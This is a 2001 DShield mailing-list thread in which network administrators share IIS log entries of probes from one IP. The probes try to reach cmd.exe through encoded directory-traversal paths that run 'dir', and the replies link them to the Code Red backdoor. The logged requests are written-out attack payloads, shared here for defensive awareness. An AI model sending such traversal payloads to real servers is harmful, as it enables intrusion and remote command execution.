[Dshield] Check this out.

Truong Nguyen truong at vina-tech.com
Tue Aug 21 16:58:59 GMT 2001


My server logs has quite a few too, from Korea and Russia, and usually, the
IP are traced back to a sparc machines.  

-----Original Message-----
From: Ron E. Johnson [mailto:Ron.Johnson at intermethod.com]
Sent: Monday, August 20, 2001 1:23 PM
To: dshield at dshield.org
Subject: RE: [Dshield] Check this out.


I seen a couple of these in my server logs.  Looks like someone trying
to come in through the backdoor CR was supposed to leave open.

Ron Johnson
Network Administrator 
Intermethod Solutions, Inc.

-----Original Message-----
From: Paul Marsh [mailto:pmarsh at nmefdn.org]
Sent: Monday, August 20, 2001 7:30 AM
To: 'Dshield (E-mail)
Subject: [Dshield] Check this out.


This is a welcoming log entree on a Monday Morning.  Anybody else get
any of
these babies over the weekend?  It's from CHINANET Shandong province
network.

2001-08-19 17:41:48 61.156.28.14 - GET /winnt/system32/cmd.exe /c+dir
401 80
- - -
2001-08-19 17:41:48 61.156.28.14 - GET /winnt/system32/cmd.exe /c+dir
401 80
- - -
2001-08-19 17:41:48 61.156.28.14 - GET
/scripts/..Á%pc../winnt/system32/cmd.exe /c+dir 401 80 - - -
2001-08-19 17:41:50 61.156.28.14 - GET
/scripts/..À%9v../winnt/system32/cmd.exe /c+dir 401 80 - - -
2001-08-19 17:41:50 61.156.28.14 - GET
/scripts/..À%qf../winnt/system32/cmd.exe /c+dir 401 80 - - -
2001-08-19 17:41:50 61.156.28.14 - GET
/scripts/..Á%8s../winnt/system32/cmd.exe /c+dir 401 80 - - -
2001-08-19 17:41:51 61.156.28.14 - GET
/scripts/..Á
../winnt/system32/cmd.exe /c+dir 401 80 - - -
2001-08-19 17:41:51 61.156.28.14 - GET /winnt/system32/cmd.exe /c+dir
401 80
- - -
2001-08-19 17:41:51 61.156.28.14 - GET
/scripts/..o../winnt/system32/cmd.exe
/c+dir 401 80 - - -
2001-08-19 17:41:53 61.156.28.14 - GET /winnt/system32/cmd.exe /c+dir
401 80
- - -
2001-08-19 17:41:53 61.156.28.14 - GET
/scripts/..ðEUREUR¯../winnt/system32/cmd.exe /c+dir 401 80 - - -
2001-08-19 17:41:53 61.156.28.14 - GET
/scripts/..øEUREUREUR¯../winnt/system32/cmd.exe /c+dir 401 80 - - -
2001-08-19 17:41:54 61.156.28.14 - GET
/scripts/..üEUREUREUREUR¯../winnt/system32/cmd.exe /c+dir 401 80 - - -
2001-08-19 17:41:54 61.156.28.14 - GET /winnt/system32/cmd.exe /c+dir
401 80
- - -

Paul M. Marsh
IT Manager
Nellie Mae Education Foundation
Tel. #  781-348-4235
Pager 877-372-1927

www.nmefdn.org

_______________________________________________
Dshield mailing list
Dshield at dshield.org
To change your subscription options (or unsubscribe), see:
http://www1.dshield.org/mailman/listinfo/dshield

_______________________________________________
Dshield mailing list
Dshield at dshield.org
To change your subscription options (or unsubscribe), see:
http://www1.dshield.org/mailman/listinfo/dshield




More information about the list mailing list